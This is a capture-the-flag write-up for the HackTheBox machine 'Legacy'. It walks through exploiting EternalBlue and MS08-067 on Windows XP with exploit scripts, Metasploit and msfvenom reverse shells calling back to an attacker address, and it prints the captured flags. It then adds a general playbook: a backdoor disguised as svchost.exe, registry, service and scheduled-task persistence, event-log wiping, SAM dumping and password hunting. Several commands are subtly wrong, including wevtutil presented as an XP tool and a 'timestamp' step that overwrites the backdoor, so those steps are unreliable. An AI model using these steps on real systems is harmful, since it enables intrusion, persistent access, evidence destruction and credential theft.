Post

HackTheBox Legacy

Writeup for HackTheBox Legacy

Posted Updated
By Edwin Tok
7 min read
HackTheBox Legacy

Machine Synopsis

Key Exploitation Techniques:

  • SMB protocol enumeration and vulnerability assessment
  • EternalBlue remote code execution (MS17-010 / CVE-2017-0143)
  • Alternative MS08-067 exploitation path
  • Immediate SYSTEM access without privilege escalation

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
5

$ nmap -p- --min-rate 10000 10.10.10.4
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Service Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

$ nmap -p 139,445,3389 -sC -sV 10.10.10.4
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-02-07T15:47:41+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Vulnerability Assessment

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Comprehensive vulnerability scan
$ nmap --script vuln -p 139,445 10.10.10.4
Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250

| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH

Critical Vulnerabilities:

  • MS17-010 (EternalBlue)
  • MS08-067 (Conficker)

Exploitation

Method 1: EternalBlue (MS17-010)

Manual Python Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

# Download EternalBlue exploit
$ git clone https://github.com/helviojunior/MS17-010.git
$ cd MS17-010

# Verify vulnerability
$ python checker.py 10.10.10.4
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

Payload Generation and Execution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

# Generate reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1234 -f exe > legacy.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: legacy.exe

# Setup netcat listener
$ nc -nlvp 1234

# Execute exploit
$ python send_and_execute.py 10.10.10.4 legacy.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82240020
SESSION: 0xe1a33408
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1243030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1243108
overwriting token UserAndGroups
Sending file legacy.exe...
Opening SVCManager on 10.10.10.4.....
Creating service VXcF.....
Starting service VXcF.....
The NETBIOS connection with the remote host timed out.
Removing service VXcF.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

SYSTEM Shell Access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> whoami
nt authority\system

C:\WINDOWS\system32> hostname
legacy

C:\WINDOWS\system32> cd "C:\Documents and Settings\john\Desktop"
C:\Documents and Settings\john\Desktop> type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\WINDOWS\system32> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
993442d258b0e0ec917cae9e695d5713

Method 2: Metasploit EternalBlue

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

$ msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.10.10.4:445       - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[+] The target is vulnerable.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.4:445       - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 10.10.10.4:445 - Connecting to target for exploitation.
[+] 10.10.10.4:445 - Connection established for exploitation.
[+] 10.10.10.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.4:445 - CORE raw buffer dump (23 bytes)
[*] 10.10.10.4:445 - 0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 20 32 36 30 30  Windows 5.1 2600
[*] 10.10.10.4:445 - 0x00000010  20 53 65 72 76 69 63 65 20 50 61 63 6b 20 33 00   Service Pack 3.
[+] 10.10.10.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.4:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.4:445 - Starting non-paged pool grooming
[+] 10.10.10.4:445 - Sending SMBv2 buffers
[+] 10.10.10.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.4:445 - Sending final SMBv2 buffers.
[*] 10.10.10.4:445 - Sending last fragment of exploit packet!
[*] 10.10.10.4:445 - Receiving response from exploit packet
[+] 10.10.10.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.4:445 - Sending egg to corrupted connection.
[*] 10.10.10.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1033)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post-Exploitation Techniques

Persistence Methods

Registry Persistence

1
2
3
4
5
6
7
8
9
10
11
12
13

# Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5555 -f exe -o backdoor.exe

# Transfer via SMB or HTTP
$ impacket-smbserver share . -smb2support
# Install backdoor
C:\WINDOWS\system32> copy \\10.10.14.3\share\backdoor.exe C:\WINDOWS\system32\svchost.exe

# Add registry auto-start entry
C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\svchost.exe"

# Verify persistence
C:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Service Installation

# Create persistent service
C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\svchost.exe" start= auto
[SC] CreateService SUCCESS

C:\WINDOWS\system32> sc start "SecurityUpdate"
[SC] StartService SUCCESS

# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > exploit

Scheduled Task (Windows XP)

# Create scheduled task using AT command
C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\svchost.exe"
Added a new job with job ID = 1

# List scheduled tasks
C:\WINDOWS\system32> at
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F S Su    3:00 PM       C:\WINDOWS\system32\svchost.exe

Defense Evasion

Log Cleanup

# Clear Windows Event Logs (Windows XP method)
C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

# Alternative method for XP
C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"

# Clear command history
C:\WINDOWS\system32> doskey /history > nul

File Attribute Manipulation

# Hide backdoor files
C:\WINDOWS\system32> attrib +h +s +r C:\WINDOWS\system32\svchost.exe

# Timestamp manipulation
C:\WINDOWS\system32> copy /y C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\svchost.exe

Lateral Movement Preparation

Network Discovery

# Discover network hosts
C:\WINDOWS\system32> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"

# Check for shared resources
C:\WINDOWS\system32> net view \\10.10.10.1

Credential Harvesting

# Dump SAM database
C:\WINDOWS\system32> reg save HKLM\SAM C:\WINDOWS\Temp\sam
C:\WINDOWS\system32> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system

# Search for stored passwords
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i password
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i config

Alternative Exploitation Methods

MS08-067 (Conficker)

1
2
3
4
5
6
7
8
9
10
11
12
13

msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms08_067_netapi) > set TARGET 6  # Windows XP SP3 English (AlwaysOn NX)
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035)

Manual EternalBlue Variants

1
2
3
4
5
6
7
8
9
10

# Alternative Python implementations
$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
$ cd AutoBlue-MS17-010
$ python eternal_checker.py 10.10.10.4
$ python eternalblue_exploit7.py 10.10.10.4 shellcode/sc_all.bin

# Another implementation
$ git clone https://github.com/worawit/MS17-010.git
$ cd MS17-010
$ python eternalblue_exploit7.py 10.10.10.4
HackTheBox
windows
This post is licensed under CC BY 4.0 by the author.